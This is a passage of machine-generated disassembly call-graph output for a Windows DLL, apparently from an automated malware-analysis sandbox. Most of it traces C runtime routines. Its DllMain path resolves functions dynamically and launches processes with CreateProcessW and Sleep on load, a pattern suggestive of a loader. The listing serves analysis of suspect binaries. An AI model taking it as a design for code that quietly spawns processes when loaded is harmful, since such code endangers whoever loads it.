15609->15601 15621 6f9f1e2f 15610->15621 15613 6f9eeea2 __fread_nolock 39 API calls 15614 6f9ece95 15613->15614 15625 6f9f2473 15614->15625 15617 6f9f0444 ___free_lconv_mon 14 API calls 15617->15609 15667 6f9ecc91 RtlLeaveCriticalSection 15618->15667 15620 6f9ece37 15620->15598 15622 6f9f1e46 15621->15622 15624 6f9ece89 15621->15624 15623 6f9f0444 ___free_lconv_mon 14 API calls 15622->15623 15622->15624 15623->15624 15624->15613 15626 6f9f249c 15625->15626 15627 6f9ece9c 15625->15627 15628 6f9f24eb 15626->15628 15630 6f9f24c3 15626->15630 15627->15609 15627->15617 15629 6f9ede7c __vfwprintf_l 29 API calls 15628->15629 15629->15627 15632 6f9f23e2 15630->15632 15633 6f9f23ee ___scrt_is_nonwritable_in_current_image 15632->15633 15640 6f9f5062 RtlEnterCriticalSection 15633->15640 15635 6f9f23fc 15636 6f9f242d 15635->15636 15641 6f9f2546 15635->15641 15654 6f9f2467 15636->15654 15640->15635 15642 6f9f52de __wsopen_s 39 API calls 15641->15642 15645 6f9f2556 15642->15645 15643 6f9f255c 15657 6f9f524d 15643->15657 15645->15643 15646 6f9f52de __wsopen_s 39 API calls 15645->15646 15652 6f9f258e 15645->15652 15648 6f9f2585 15646->15648 15647 6f9f52de __wsopen_s 39 API calls 15649 6f9f259a CloseHandle 15647->15649 15650 6f9f52de __wsopen_s 39 API calls 15648->15650 15649->15643 15651 6f9f25a6 GetLastError 15649->15651 15650->15652 15651->15643 15652->15643 15652->15647 15653 6f9f25b4 __wsopen_s 15653->15636 15666 6f9f5117 RtlLeaveCriticalSection 15654->15666 15656 6f9f2450 15656->15627 15658 6f9f52c3 15657->15658 15660 6f9f525c 15657->15660 15659 6f9f0431 __dosmaperr 14 API calls 15658->15659 15661 6f9f52c8 15659->15661 15660->15658 15665 6f9f5286 __wsopen_s 15660->15665 15662 6f9f041e __dosmaperr 14 API calls 15661->15662 15663 6f9f52b3 15662->15663 15663->15653 15664 6f9f52ad SetStdHandle 15664->15663 15665->15663 15665->15664 15666->15656 15667->15620 15670 6f9edbc2 ___scrt_is_nonwritable_in_current_image 15668->15670 15669 6f9edbb1 15669->14152 15670->15669 15671 6f9edc0c 15670->15671 15672 6f9edbd5 __fread_nolock 15670->15672 15681 6f9ecc7d RtlEnterCriticalSection 15671->15681 15674 6f9f0431 __dosmaperr 14 API calls 15672->15674 15676 6f9edbef 15674->15676 15675 6f9edc16 15682 6f9ed9c0 15675->15682 15678 6f9edef9 __wsopen_s 39 API calls 15676->15678 15678->15669 15681->15675 15685 6f9ed9d2 __fread_nolock 15682->15685 15688 6f9ed9ef 15682->15688 15683 6f9ed9df 15684 6f9f0431 __dosmaperr 14 API calls 15683->15684 15686 6f9ed9e4 15684->15686 15685->15683 15685->15688 15693 6f9eda30 __fread_nolock 15685->15693 15687 6f9edef9 __wsopen_s 39 API calls 15686->15687 15687->15688 15695 6f9edc4b 15688->15695 15689 6f9edb5b __fread_nolock 15692 6f9f0431 __dosmaperr 14 API calls 15689->15692 15691 6f9eeea2 __fread_nolock 39 API calls 15691->15693 15692->15686 15693->15688 15693->15689 15693->15691 15698 6f9edc53 15693->15698 15712 6f9efe17 15693->15712 15805 6f9ecc91 RtlLeaveCriticalSection 15695->15805 15697 6f9edc51 15697->15669 15699 6f9edc64 15698->15699 15702 6f9edc60 __fread_nolock 15698->15702 15700 6f9edc6b 15699->15700 15704 6f9edc7e __fread_nolock 15699->15704 15701 6f9f0431 __dosmaperr 14 API calls 15700->15701 15703 6f9edc70 15701->15703 15702->15693 15705 6f9edef9 __wsopen_s 39 API calls 15703->15705 15704->15702 15706 6f9edcac 15704->15706 15708 6f9edcb5 15704->15708 15705->15702 15707 6f9f0431 __dosmaperr 14 API calls 15706->15707 15709 6f9edcb1 15707->15709 15708->15702 15710 6f9f0431 __dosmaperr 14 API calls 15708->15710 15711 6f9edef9 __wsopen_s 39 API calls 15709->15711 15710->15709 15711->15702 15713 6f9efe29 15712->15713 15714 6f9efe41 15712->15714 15716 6f9f041e __dosmaperr 14 API calls 15713->15716 15715 6f9f0183 15714->15715 15721 6f9efe84 15714->15721 15718 6f9f041e __dosmaperr 14 API calls 15715->15718 15717 6f9efe2e 15716->15717 15719 6f9f0431 __dosmaperr 14 API calls 15717->15719 15720 6f9f0188 15718->15720 15722 6f9efe36 15719->15722 15723 6f9f0431 __dosmaperr 14 API calls 15720->15723 15721->15722 15724 6f9efe8f 15721->15724 15730 6f9efebf 15721->15730 15722->15693 15725 6f9efe9c 15723->15725 15726 6f9f041e __dosmaperr 14 API calls 15724->15726 15728 6f9edef9 __wsopen_s 39 API calls 15725->15728 15727 6f9efe94 15726->15727 15729 6f9f0431 __dosmaperr 14 API calls 15727->15729 15728->15722 15729->15725 15731 6f9efed8 15730->15731 15732 6f9efee5 15730->15732 15733 6f9eff13 15730->15733 15731->15732 15766 6f9eff01 15731->15766 15734 6f9f041e __dosmaperr 14 API calls 15732->15734 15736 6f9f047e __fread_nolock 15 API calls 15733->15736 15735 6f9efeea 15734->15735 15737 6f9f0431 __dosmaperr 14 API calls 15735->15737 15739 6f9eff24 15736->15739 15741 6f9efef1 15737->15741 15738 6f9f5a73 __fread_nolock 39 API calls 15742 6f9f005f 15738->15742 15740 6f9f0444 ___free_lconv_mon 14 API calls 15739->15740 15743 6f9eff2d 15740->15743 15744 6f9edef9 __wsopen_s 39 API calls 15741->15744 15745 6f9f00d3 15742->15745 15748 6f9f0078 GetConsoleMode 15742->15748 15746 6f9f0444 ___free_lconv_mon 14 API calls 15743->15746 15774 6f9efefc __fread_nolock 15744->15774 15747 6f9f00d7 ReadFile 15745->15747 15749 6f9eff34 15746->15749 15750 6f9f00ef 15747->15750 15751 6f9f014b GetLastError 15747->15751 15748->15745 15752 6f9f0089 15748->15752 15753 6f9eff3e 15749->15753 15754 6f9eff59 15749->15754 15750->15751 15757 6f9f00c8 15750->15757 15755 6f9f00af 15751->15755 15756 6f9f0158 15751->15756 15752->15747 15758 6f9f008f ReadConsoleW 15752->15758 15760 6f9f0431 __dosmaperr 14 API calls 15753->15760 15762 6f9ef0cf __fread_nolock 41 API calls 15754->15762 15755->15774 15775 6f9f03d7 15755->15775 15761 6f9f0431 __dosmaperr 14 API calls 15756->15761 15770 6f9f012b 15757->15770 15771 6f9f0114 15757->15771 15757->15774 15758->15757 15763 6f9f00a9 GetLastError 15758->15763 15759 6f9f0444 ___free_lconv_mon 14 API calls 15759->15722 15764 6f9eff43 15760->15764 15765 6f9f015d 15761->15765 15762->15766 15763->15755 15768 6f9f041e __dosmaperr 14 API calls 15764->15768 15769 6f9f041e __dosmaperr 14 API calls 15765->15769 15766->15738 15768->15774 15769->15774 15770->15774 15793 6f9ef96f 15770->15793 15780 6f9efb29 15771->15780 15774->15759 15776 6f9f041e __dosmaperr 14 API calls 15775->15776 15777 6f9f03e2 __dosmaperr 15776->15777 15778 6f9f0431 __dosmaperr 14 API calls 15777->15778 15779 6f9f03f5 15778->15779 15779->15774 15799 6f9ef822 15780->15799 15782 6f9f488b __fread_nolock MultiByteToWideChar 15784 6f9efc3d 15782->15784 15787 6f9efc46 GetLastError 15784->15787 15790 6f9efb71 15784->15790 15785 6f9efbcb 15791 6f9efb85 15785->15791 15792 6f9ef0cf __fread_nolock 41 API calls 15785->15792 15786 6f9efbbb 15788 6f9f0431 __dosmaperr 14 API calls 15786->15788 15789 6f9f03d7 __dosmaperr 14 API calls 15787->15789 15788->15790 15789->15790 15790->15774 15791->15782 15792->15791 15795 6f9ef9a9 15793->15795 15794 6f9efa3a 15794->15774 15795->15794 15796 6f9efa3f ReadFile 15795->15796 15796->15794 15797 6f9efa5c 15796->15797 15797->15794 15798 6f9ef0cf __fread_nolock 41 API calls 15797->15798 15798->15794 15800 6f9ef856 15799->15800 15801 6f9ef8c7 ReadFile 15800->15801 15802 6f9ef8c2 15800->15802 15801->15802 15803 6f9ef8e0 15801->15803 15802->15785 15802->15786 15802->15790 15802->15791 15803->15802 15804 6f9ef0cf __fread_nolock 41 API calls 15803->15804 15804->15802 15805->15697 15807 6f9ec37b __vfwprintf_l 39 API calls 15806->15807 15811 6f9ec801 15807->15811 15808 6f9ec849 15809 6f9ec86e 15808->15809 15812 6f9ec320 __vfwprintf_l 39 API calls 15808->15812 15822 6f9ecab6 15809->15822 15810 6f9ec816 15814 6f9ede7c __vfwprintf_l 29 API calls 15810->15814 15811->15808 15811->15810 15821 6f9ec831 __DllMainCRTStartup@12 15811->15821 15812->15809 15814->15821 15815 6f9ecab6 __DllMainCRTStartup@12 42 API calls 15816 6f9ec883 15815->15816 15816->15815 15817 6f9ec8ac 15816->15817 15818 6f9ec2c5 __vfwprintf_l 39 API calls 15817->15818 15820 6f9ec937 __aulldiv __DllMainCRTStartup@12 15817->15820 15818->15820 15819 6f9ec2c5 __vfwprintf_l 39 API calls 15819->15821 15820->15819 15821->15397 15823 6f9ecac2 15822->15823 15827 6f9ecad8 15822->15827 15829 6f9f14e7 15823->15829 15825 6f9ecacd __vfwprintf_l 15825->15816 15826 6f9ecae8 15826->15816 15827->15826 15834 6f9f158d 15827->15834 15841 6f9ef497 GetLastError 15829->15841 15872 6f9f150b 15834->15872 15836 6f9f15ba 15839 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15836->15839 15840 6f9f1656 15839->15840 15840->15826 15842 6f9ef4ad 15841->15842 15843 6f9ef4b3 15841->15843 15845 6f9f1930 __dosmaperr 6 API calls 15842->15845 15844 6f9f196f __dosmaperr 6 API calls 15843->15844 15847 6f9ef4b7 SetLastError 15843->15847 15846 6f9ef4cf 15844->15846 15845->15843 15846->15847 15849 6f9f1658 __dosmaperr 14 API calls 15846->15849 15851 6f9ef54c 15847->15851 15852 6f9ef547 15847->15852 15850 6f9ef4e4 15849->15850 15853 6f9ef4ec 15850->15853 15854 6f9ef4fd 15850->15854 15855 6f9eed44 __FrameHandler3::FrameUnwindToState 37 API calls 15851->15855 15868 6f9f04cc 15852->15868 15856 6f9f196f __dosmaperr 6 API calls 15853->15856 15857 6f9f196f __dosmaperr 6 API calls 15854->15857 15858 6f9ef551 15855->15858 15859 6f9ef4fa 15856->15859 15860 6f9ef509 15857->15860 15864 6f9f0444 ___free_lconv_mon 14 API calls 15859->15864 15861 6f9ef50d 15860->15861 15862 6f9ef524 15860->15862 15863 6f9f196f __dosmaperr 6 API calls 15861->15863 15865 6f9ef299 __dosmaperr 14 API calls 15862->15865 15863->15859 15864->15847 15866 6f9ef52f 15865->15866 15867 6f9f0444 ___free_lconv_mon 14 API calls 15866->15867 15867->15847 15869 6f9f04df 15868->15869 15870 6f9f04f4 15868->15870 15869->15870 15871 6f9f5611 __vfwprintf_l 39 API calls 15869->15871 15870->15825 15871->15870 15873 6f9f1529 15872->15873 15879 6f9f1522 15872->15879 15874 6f9ef497 _unexpected 39 API calls 15873->15874 15873->15879 15875 6f9f154a 15874->15875 15876 6f9f04cc __DllMainCRTStartup@12 39 API calls 15875->15876 15877 6f9f1560 15876->15877 15895 6f9f052a 15877->15895 15879->15836 15880 6f9f5952 15879->15880 15881 6f9f150b __DllMainCRTStartup@12 39 API calls 15880->15881 15882 6f9f5972 15881->15882 15883 6f9f488b __fread_nolock MultiByteToWideChar 15882->15883 15886 6f9f599f 15883->15886 15884 6f9f5a2e 15887 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15884->15887 15885 6f9f5a26 15899 6f9f5a53 15885->15899 15886->15884 15886->15885 15889 6f9f047e __fread_nolock 15 API calls 15886->15889 15891 6f9f59c4 __fread_nolock __alloca_probe_16 15886->15891 15890 6f9f5a51 15887->15890 15889->15891 15890->15836 15891->15885 15892 6f9f488b __fread_nolock MultiByteToWideChar 15891->15892 15893 6f9f5a0d 15892->15893 15893->15885 15894 6f9f5a14 GetStringTypeW 15893->15894 15894->15885 15896 6f9f053d 15895->15896 15897 6f9f0552 15895->15897 15896->15897 15898 6f9f455a __vfwprintf_l 39 API calls 15896->15898 15897->15879 15898->15897 15900 6f9f5a5f 15899->15900 15901 6f9f5a70 15899->15901 15900->15901 15902 6f9f0444 ___free_lconv_mon 14 API calls 15900->15902 15901->15884 15902->15901 15904 6f9ed2cf 15903->15904 15909 6f9ed2f7 15903->15909 15905 6f9ed2fe 15904->15905 15906 6f9ed2dc 15904->15906 15904->15909 15911 6f9ed21a 15905->15911 15907 6f9ede7c __vfwprintf_l 29 API calls 15906->15907 15907->15909 15909->15403 15940->14189 15941 6f9e4e89 15942 6f9e4e97 15941->15942 15943 6f9e4e92 15941->15943 15947 6f9e4d53 15942->15947 15962 6f9e508a 15943->15962 15948 6f9e4d5f ___scrt_is_nonwritable_in_current_image 15947->15948 15949 6f9e4d88 dllmain_raw 15948->15949 15950 6f9e4d83 15948->15950 15959 6f9e4d6e 15948->15959 15951 6f9e4da2 dllmain_crt_dispatch 15949->15951 15949->15959 15966 6f9e1000 15950->15966 15951->15950 15951->15959 15963 6f9e50a0 15962->15963 15965 6f9e50a9 15963->15965 16061 6f9e503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15963->16061 15965->15942 15967 6f9e1012 15966->15967 15968 6f9e1010 15966->15968 15971 6f9e4402 15967->15971 15972 6f9e4430 __fread_nolock 15971->15972 16017 6f9e171f 15972->16017 15975 6f9e1135 __DllMainCRTStartup@12 44 API calls 15976 6f9e4456 __DllMainCRTStartup@12 _strlen 15975->15976 15977 6f9e1075 __DllMainCRTStartup@12 43 API calls 15976->15977 15978 6f9e44ae 15977->15978 15979 6f9ed5ab ___std_exception_destroy 14 API calls 15978->15979 15980 6f9e44b9 GetEnvironmentVariableW 15979->15980 15981 6f9e1135 __DllMainCRTStartup@12 44 API calls 15980->15981 15982 6f9e44e6 __DllMainCRTStartup@12 _strlen 15981->15982 15983 6f9e1075 __DllMainCRTStartup@12 43 API calls 15982->15983 15984 6f9e4545 15983->15984 15985 6f9ed5ab ___std_exception_destroy 14 API calls 15984->15985 15986 6f9e4550 15985->15986 15987 6f9e1135 __DllMainCRTStartup@12 44 API calls 15986->15987 15988 6f9e4567 __DllMainCRTStartup@12 _strlen 15987->15988 15989 6f9e1075 __DllMainCRTStartup@12 43 API calls 15988->15989 15990 6f9e45bc 15989->15990 15991 6f9ed5ab ___std_exception_destroy 14 API calls 15990->15991 15992 6f9e45c7 15991->15992 15993 6f9e1135 __DllMainCRTStartup@12 44 API calls 15992->15993 15994 6f9e45de __DllMainCRTStartup@12 _strlen 15993->15994 15995 6f9e1075 __DllMainCRTStartup@12 43 API calls 15994->15995 15996 6f9e4636 15995->15996 15997 6f9ed5ab ___std_exception_destroy 14 API calls 15996->15997 15998 6f9e4641 15997->15998 16037 6f9e192f 15998->16037 16001 6f9e1135 __DllMainCRTStartup@12 44 API calls 16002 6f9e467b __DllMainCRTStartup@12 _strlen 16001->16002 16003 6f9e1075 __DllMainCRTStartup@12 43 API calls 16002->16003 16004 6f9e46da 16003->16004 16005 6f9ed5ab ___std_exception_destroy 14 API calls 16004->16005 16006 6f9e46e5 16005->16006 16007 6f9e1135 __DllMainCRTStartup@12 44 API calls 16006->16007 16008 6f9e46fc __DllMainCRTStartup@12 _strlen 16007->16008 16009 6f9e1075 __DllMainCRTStartup@12 43 API calls 16008->16009 16010 6f9e4758 16009->16010 16011 6f9ed5ab ___std_exception_destroy 14 API calls 16010->16011 16012 6f9e4763 16011->16012 16013 6f9e1b85 __DllMainCRTStartup@12 120 API calls 16012->16013 16014 6f9e4782 16013->16014 16059 6f9e6180 16017->16059 16020 6f9e1135 __DllMainCRTStartup@12 44 API calls 16022 6f9e1775 __DllMainCRTStartup@12 _strlen 16020->16022 16021 6f9e17d8 GetProcAddress 16023 6f9ed5ab ___std_exception_destroy 14 API calls 16021->16023 16022->16021 16024 6f9e17f5 16023->16024 16025 6f9e1135 __DllMainCRTStartup@12 44 API calls 16024->16025 16027 6f9e1806 __DllMainCRTStartup@12 _strlen 16025->16027 16026 6f9e1869 GetProcAddress 16028 6f9ed5ab ___std_exception_destroy 14 API calls 16026->16028 16027->16026 16029 6f9e1886 16028->16029 16030 6f9e1135 __DllMainCRTStartup@12 44 API calls 16029->16030 16032 6f9e1897 __DllMainCRTStartup@12 _strlen 16030->16032 16031 6f9e18fa GetProcAddress 16033 6f9ed5ab ___std_exception_destroy 14 API calls 16031->16033 16032->16031 16034 6f9e1917 16033->16034 16035 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16034->16035 16036 6f9e1927 16035->16036 16036->15975 16038 6f9e1957 __fread_nolock 16037->16038 16039 6f9e1135 __DllMainCRTStartup@12 44 API calls 16038->16039 16040 6f9e19b3 __DllMainCRTStartup@12 _strlen 16039->16040 16041 6f9e1075 __DllMainCRTStartup@12 43 API calls 16040->16041 16042 6f9e1a0b 16041->16042 16043 6f9ed5ab ___std_exception_destroy 14 API calls 16042->16043 16044 6f9e1a16 16043->16044 16045 6f9e1075 __DllMainCRTStartup@12 43 API calls 16044->16045 16046 6f9e1a3a CreateProcessW 16045->16046 16047 6f9e1a68 16046->16047 16049 6f9e1a6f __fread_nolock 16046->16049 16048 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16047->16048 16050 6f9e1b7d Sleep Sleep 16048->16050 16051 6f9e1135 __DllMainCRTStartup@12 44 API calls 16049->16051 16050->16001 16052 6f9e1aba __DllMainCRTStartup@12 _strlen 16051->16052 16053 6f9e1075 __DllMainCRTStartup@12 43 API calls 16052->16053 16054 6f9e1b0f 16053->16054 16055 6f9ed5ab ___std_exception_destroy 14 API calls 16054->16055 16056 6f9e1b1a 16055->16056 16057 6f9e1075 __DllMainCRTStartup@12 43 API calls 16056->16057 16058 6f9e1b3c CreateProcessW 16057->16058 16058->16047 16060 6f9e174a GetModuleHandleW 16059->16060 16060->16020 16061->15965 16859 6f9e4b49 16860 6f9e4b87 16859->16860 16861 6f9e4b54 16859->16861 16898 6f9e4ca3 16860->16898 16863 6f9e4b79 16861->16863 16864 6f9e4b59 16861->16864 16884 6f9e4b9c 16863->16884 16866 6f9e4b5e 16864->16866 16867 6f9e4b6f 16864->16867 16870 6f9e4b63 16866->16870 16871 6f9e51de 16866->16871 16876 6f9e51bf 16867->16876 16925 6f9eecbe 16871->16925 17009 6f9e671c 16876->17009 16879 6f9e51c8 16879->16870 16882 6f9e51db 16882->16870 16883 6f9e6727 21 API calls 16883->16879 16885 6f9e4ba8 ___scrt_is_nonwritable_in_current_image 16884->16885 17015 6f9e524f 16885->17015 16887 6f9e4baf __DllMainCRTStartup@12 16888 6f9e4c9b 16887->16888 16889 6f9e4bd6 16887->16889 16895 6f9e4c12 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 16887->16895 17031 6f9e53ee IsProcessorFeaturePresent 16888->17031 17023 6f9e51b1 16889->17023 16892 6f9e4ca2 16893 6f9e4be5 __RTC_Initialize 16893->16895 17026 6f9e50d5 RtlInitializeSListHead 16893->17026 16895->16870 16896 6f9e4bf3 16896->16895 17027 6f9e5186 16896->17027 16899 6f9e4caf ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 16898->16899 16900 6f9e4d4b 16899->16900 16901 6f9e4ce0 16899->16901 16917 6f9e4cb8 16899->16917 16902 6f9e53ee __DllMainCRTStartup@12 4 API calls 16900->16902 17075 6f9e521f 16901->17075 16906 6f9e4d52 ___scrt_is_nonwritable_in_current_image 16902->16906 16904 6f9e4ce5 17084 6f9e50e1 16904->17084 16908 6f9e4d88 dllmain_raw 16906->16908 16909 6f9e4d83 16906->16909 16922 6f9e4d6e 16906->16922 16907 6f9e4cea __RTC_Initialize __DllMainCRTStartup@12 17087 6f9e53c0 16907->17087 16910 6f9e4da2 dllmain_crt_dispatch 16908->16910 16908->16922 16912 6f9e1000 __DllMainCRTStartup@12 130 API calls 16909->16912 16910->16909 16910->16922 16914 6f9e4dc3 16912->16914 16916 6f9e4df4 16914->16916 16919 6f9e1000 __DllMainCRTStartup@12 130 API calls 16914->16919 16918 6f9e4dfd dllmain_crt_dispatch 16916->16918 16916->16922 16917->16870 16920 6f9e4e10 dllmain_raw 16918->16920 16918->16922 16921 6f9e4ddb 16919->16921 16920->16922 16923 6f9e4ca3 __DllMainCRTStartup@12 145 API calls 16921->16923 16922->16870 16924 6f9e4de9 dllmain_raw 16923->16924 16924->16916 16931 6f9ef46b 16925->16931 16928 6f9e6727 16997 6f9e676a 16928->16997 16932 6f9e51e3 16931->16932 16933 6f9ef475 16931->16933 16932->16928 16934 6f9f1930 __dosmaperr 6 API calls 16933->16934 16935 6f9ef47c 16934->16935 16935->16932 16936 6f9f196f __dosmaperr 6 API calls 16935->16936 16937 6f9ef48f 16936->16937 16939 6f9ef332 16937->16939 16940 6f9ef34d 16939->16940 16941 6f9ef33d 16939->16941 16940->16932 16945 6f9ef353 16941->16945 16944 6f9f0444 ___free_lconv_mon 14 API calls 16944->16940 16946 6f9ef368 16945->16946 16947 6f9ef36e 16945->16947 16949 6f9f0444 ___free_lconv_mon 14 API calls 16946->16949 16948 6f9f0444 ___free_lconv_mon 14 API calls 16947->16948 16950 6f9ef37a 16948->16950 16949->16947 16951 6f9f0444 ___free_lconv_mon 14 API calls 16950->16951 16952 6f9ef385 16951->16952 16953 6f9f0444 ___free_lconv_mon 14 API calls 16952->16953 16954 6f9ef390 16953->16954 16955 6f9f0444 ___free_lconv_mon 14 API calls 16954->16955 16956 6f9ef39b 16955->16956 16957 6f9f0444 ___free_lconv_mon 14 API calls 16956->16957 16958 6f9ef3a6 16957->16958 16959 6f9f0444 ___free_lconv_mon 14 API calls 16958->16959 16960 6f9ef3b1 16959->16960 16961 6f9f0444 ___free_lconv_mon 14 API calls 16960->16961 16962 6f9ef3bc 16961->16962 16963 6f9f0444 ___free_lconv_mon 14 API calls 16962->16963 16964 6f9ef3c7 16963->16964 16965 6f9f0444 ___free_lconv_mon 14 API calls 16964->16965 16966 6f9ef3d5 16965->16966 16971 6f9ef17f 16966->16971 16972 6f9ef18b ___scrt_is_nonwritable_in_current_image 16971->16972 16987 6f9f351f RtlEnterCriticalSection 16972->16987 16975 6f9ef195 16977 6f9f0444 ___free_lconv_mon 14 API calls 16975->16977 16978 6f9ef1bf 16975->16978 16977->16978 16988 6f9ef1de 16978->16988 16979 6f9ef1ea 16980 6f9ef1f6 ___scrt_is_nonwritable_in_current_image 16979->16980 16992 6f9f351f RtlEnterCriticalSection 16980->16992 16982 6f9ef200 16983 6f9ef420 __dosmaperr 14 API calls 16982->16983 16984 6f9ef213 16983->16984 16993 6f9ef233 16984->16993 16987->16975 16991 6f9f3567 RtlLeaveCriticalSection 16988->16991 16990 6f9ef1cc 16990->16979 16991->16990 16992->16982 16996 6f9f3567 RtlLeaveCriticalSection 16993->16996 16995 6f9ef221 16995->16944 16996->16995 16998 6f9e51e8 16997->16998 16999 6f9e6774 16997->16999 16998->16870 17000 6f9e7973 ___vcrt_FlsGetValue 6 API calls 16999->17000 17001 6f9e677b 17000->17001 17002 6f9e79ae ___vcrt_FlsSetValue 6 API calls 17001->17002 17003 6f9e678a 17002->17003 17005 6f9e674e 17003->17005 17006 6f9e6758 17005->17006 17007 6f9e6765 17005->17007 17006->17007 17008 6f9ed5ab ___std_exception_destroy 14 API calls 17006->17008 17007->16998 17008->17007 17010 6f9e67a3 __FrameHandler3::FrameUnwindToState 23 API calls 17009->17010 17011 6f9e51c4 17010->17011 17011->16879 17012 6f9eecb3 17011->17012 17013 6f9ef5e8 __dosmaperr 14 API calls 17012->17013 17014 6f9e51d0 17013->17014 17014->16882 17014->16883 17016 6f9e5258 17015->17016 17035 6f9e55eb IsProcessorFeaturePresent 17016->17035 17020 6f9e5269 17021 6f9e526d 17020->17021 17022 6f9e672f ___scrt_uninitialize_crt 7 API calls 17020->17022 17021->16887 17022->17021 17069 6f9e5288 17023->17069 17025 6f9e51b8 17025->16893 17026->16896 17028 6f9e518b ___scrt_release_startup_lock 17027->17028 17029 6f9e55eb IsProcessorFeaturePresent 17028->17029 17030 6f9e5194 17028->17030 17029->17030 17030->16895 17032 6f9e5404 __fread_nolock __FrameHandler3::FrameUnwindToState 17031->17032 17033 6f9e54af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17032->17033 17034 6f9e54f3 __FrameHandler3::FrameUnwindToState 17033->17034 17034->16892 17036 6f9e5264 17035->17036 17037 6f9e66fd 17036->17037 17045 6f9e77a7 17037->17045 17040 6f9e6706 17040->17020 17042 6f9e670e 17043 6f9e6719 17042->17043 17044 6f9e77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17042->17044 17043->17020 17044->17040 17046 6f9e77b0 17045->17046 17048 6f9e77d9 17046->17048 17049 6f9e6702 17046->17049 17059 6f9e79ec 17046->17059 17050 6f9e77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17048->17050 17049->17040 17051 6f9e6835 17049->17051 17050->17049 17064 6f9e78fd 17051->17064 17054 6f9e684a 17054->17042 17055 6f9e79ae ___vcrt_FlsSetValue 6 API calls 17056 6f9e6858 17055->17056 17057 6f9e6865 17056->17057 17058 6f9e6868 ___vcrt_uninitialize_ptd 6 API calls 17056->17058 17057->17042 17058->17054 17060 6f9e7812 ___vcrt_FlsSetValue 5 API calls 17059->17060 17061 6f9e7a06 17060->17061 17062 6f9e7a24 InitializeCriticalSectionAndSpinCount 17061->17062 17063 6f9e7a0f 17061->17063 17062->17063 17063->17046 17065 6f9e7812 ___vcrt_FlsSetValue 5 API calls 17064->17065 17066 6f9e7917 17065->17066 17067 6f9e7930 TlsAlloc 17066->17067 17068 6f9e683f 17066->17068 17068->17054 17068->17055 17070 6f9e5298 17069->17070 17071 6f9e5294 17069->17071 17072 6f9e53ee __DllMainCRTStartup@12 4 API calls 17070->17072 17074 6f9e52a5 ___scrt_release_startup_lock 17070->17074 17071->17025 17073 6f9e530e 17072->17073 17074->17025 17076 6f9e5224 ___scrt_release_startup_lock 17075->17076 17077 6f9e5228 17076->17077 17080 6f9e5234 __DllMainCRTStartup@12 17076->17080 17078 6f9eeb1d __DllMainCRTStartup@12 14 API calls 17077->17078 17079 6f9e5232 17078->17079 17079->16904 17081 6f9e5241 17080->17081 17082 6f9ee306 __FrameHandler3::FrameUnwindToState 21 API calls 17080->17082 17081->16904 17083 6f9ee4c5 17082->17083 17083->16904 17096 6f9e66da RtlInterlockedFlushSList 17084->17096 17088 6f9e53cc 17087->17088 17089 6f9e4d09 17088->17089 17100 6f9eecc6 17088->17100 17093 6f9e4d45 17089->17093 17091 6f9e53da 17092 6f9e672f ___scrt_uninitialize_crt 7 API calls 17091->17092 17092->17089 17174 6f9e5242 17093->17174 17097 6f9e66ea 17096->17097 17098 6f9e50eb 17096->17098 17097->17098 17099 6f9ed5ab ___std_exception_destroy 14 API calls 17097->17099 17098->16907 17099->17097 17102 6f9eecd1 17100->17102 17103 6f9eece3 ___scrt_uninitialize_crt 17100->17103 17101 6f9eecdf 17101->17091 17102->17101 17105 6f9f1e26 17102->17105 17103->17091 17108 6f9f1cb7 17105->17108 17111 6f9f1c0b 17108->17111 17112 6f9f1c17 ___scrt_is_nonwritable_in_current_image 17111->17112 17119 6f9f351f RtlEnterCriticalSection 17112->17119 17114 6f9f1c8d 17128 6f9f1cab 17114->17128 17115 6f9f1c21 ___scrt_uninitialize_crt 17115->17114 17120 6f9f1b7f 17115->17120 17119->17115 17121 6f9f1b8b ___scrt_is_nonwritable_in_current_image 17120->17121 17131 6f9ecc7d RtlEnterCriticalSection 17121->17131 17123 6f9f1b95 ___scrt_uninitialize_crt 17127 6f9f1bce 17123->17127 17132 6f9f1dc1 17123->17132 17145 6f9f1bff 17127->17145 17173 6f9f3567 RtlLeaveCriticalSection 17128->17173 17130 6f9f1c99 17130->17101 17131->17123 17133 6f9f1dd6 __vfwprintf_l 17132->17133 17134 6f9f1ddd 17133->17134 17135 6f9f1de8 17133->17135 17136 6f9f1cb7 ___scrt_uninitialize_crt 68 API calls 17134->17136 17137 6f9f1d58 __vfwprintf_l 64 API calls 17135->17137 17138 6f9f1de3 17136->17138 17139 6f9f1df2 17137->17139 17140 6f9e7d4e __vfwprintf_l 39 API calls 17138->17140 17139->17138 17142 6f9eeea2 __fread_nolock 39 API calls 17139->17142 17141 6f9f1e20 17140->17141 17141->17127 17143 6f9f1e09 17142->17143 17148 6f9f7a65 17143->17148 17172 6f9ecc91 RtlLeaveCriticalSection 17145->17172 17147 6f9f1bed 17147->17115 17149 6f9f7a76 17148->17149 17150 6f9f7a83 17148->17150 17151 6f9f0431 __dosmaperr 14 API calls 17149->17151 17152 6f9f7acc 17150->17152 17154 6f9f7aaa 17150->17154 17158 6f9f7a7b 17151->17158 17153 6f9f0431 __dosmaperr 14 API calls 17152->17153 17155 6f9f7ad1 17153->17155 17159 6f9f79c3 17154->17159 17157 6f9edef9 __wsopen_s 39 API calls 17155->17157 17157->17158 17158->17138 17160 6f9f79cf ___scrt_is_nonwritable_in_current_image 17159->17160 17161 6f9f5062 __wsopen_s RtlEnterCriticalSection 17160->17161 17162 6f9f79de 17161->17162 17163 6f9f7a23 17162->17163 17164 6f9f52de __wsopen_s 39 API calls 17162->17164 17165 6f9f0431 __dosmaperr 14 API calls 17163->17165 17166 6f9f7a0a FlushFileBuffers 17164->17166 17167 6f9f7a2a 17165->17167 17166->17167 17168 6f9f7a16 GetLastError 17166->17168 17170 6f9f7a59 ___scrt_uninitialize_crt RtlLeaveCriticalSection 17167->17170 17169 6f9f041e __dosmaperr 14 API calls 17168->17169 17169->17163 